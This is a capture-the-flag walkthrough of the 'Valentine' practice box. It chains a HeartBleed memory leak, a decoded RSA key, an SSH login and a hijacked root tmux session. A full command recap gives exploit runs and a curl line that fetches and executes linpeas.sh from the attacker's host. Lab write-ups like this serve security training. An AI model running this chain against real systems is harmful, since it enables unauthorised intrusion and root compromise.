Valentine | Linux
Difficulty: Medium
Tags: HeartBleed, memory leak, base64 decoding, privesc, tmux
Tools Used: Nmap, Gobuster, Searchsploit, Python, CyberChef, SSH, LinPEAS

Valentine isn’t about obscure exploits or edge-case kernel abuse. It’s about fundamentals. Memory leaks. Leaked secrets. Enumeration discipline. You’ll weaponize HeartBleed, decode exposed data, pivot into a user shell, and pull root through an abandoned tmux session. If you’ve ever underestimated OpenSSL bugs, this box will remind you why they matter.

Initial Enumeration

First step: scan for low-hanging fruit.

nmap -sC -sV -oN init-scan --script vuln 10.129.1.190

Results:

22/tcp   open  ssh     OpenSSH 5.9p1  
80/tcp   open  http    Apache 2.2.22  
443/tcp  open  https   Apache 2.2.22 (SSL)

Nmap’s vuln script flagged HeartBleed on port 443:

State: VULNERABLE  
Risk factor: High  
Affected: OpenSSL 1.0.1 and 1.0.2-beta

This is the core of the box. No need for brute force. Just precision exploitation.

Web Enumeration

Took a quick pass over HTTP with Gobuster:

gobuster dir --url http://10.129.1.190 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o init-gob

Findings:

/dev/  
/dev/hype_key

Visiting /dev/hype_key returned a hex-encoded blob.

Piped it into CyberChef — first hex decoded to a Base64 string. Decoding revealed what looked like an encrypted RSA private key.

Saved it locally as hype_rsa and noted that we might need a passphrase.

HeartBleed Exploitation

Searched for a weaponized exploit:

searchsploit heartbleed

Picked Python PoC: 32764.py — a solid script for pulling memory leaks.

python 32764.py 10.129.1.190

Output included a juicy Base64 string:

aGVhcnRibGVlZGJlbGlldmVoeXBlCg==

Decoded:

heartbleedbelievehype

That smelled like an SSH key passphrase.

SSH Access & User Flag

Armed with the decrypted key and passphrase, we tried:

chmod 600 hype_rsa
ssh hype@10.129.1.190 -i hype_rsa

Success.

Landed a shell as hype. Grabbed the user flag:

cat ~/user.txt

Privilege Escalation with LinPEAS

Uploaded linpeas.sh:

python3 -m http.server 5555     # on attacker machine
curl http://10.10.15.75:5555/linpeas.sh -o /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh

LinPEAS flagged an active root tmux socket:

/usr/bin/tmux -S /.devs/dev_sess

This was the escalation vector.

Root Access via Tmux

Attached to the tmux session:

/usr/bin/tmux -S /.devs/dev_sess attach

Root shell.

Final flag:

whoami
root
cat /root/root.txt

Summary / Review

This one was elegant:

HeartBleed → extracted memory contents
RSA key + passphrase from leaked data
SSH login with key
LinPEAS finds root socket
Tmux hijack gives root shell

Valentine is a showcase of classic flaws chained together for full compromise. No buffer overflows. No complex binaries. Just bad secrets management and forgotten sessions.

Command Recap

nmap -sC -sV -oN init-scan --script vuln 10.129.1.190  
gobuster dir --url http://10.129.1.190 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  
# Visit /dev/hype_key and decode blob using CyberChef  
python 32764.py 10.129.1.190  
# Decode base64 → "heartbleedbelievehype"  
chmod 600 hype_rsa  
ssh hype@10.129.1.190 -i hype_rsa  
python3 -m http.server 5555  
curl http://10.10.15.75:5555/linpeas.sh -o /tmp/linpeas.sh  
chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh  
/usr/bin/tmux -S /.devs/dev_sess attach  
cat /root/root.txt

Final Thoughts

Memory leaks. Leaked secrets. Forgotten sessions.

Valentine shows how vulnerabilities don’t have to be complex to be critical. Sometimes it only takes one bug… and one missed cleanup.

Rooted with love. 💘
On to the next.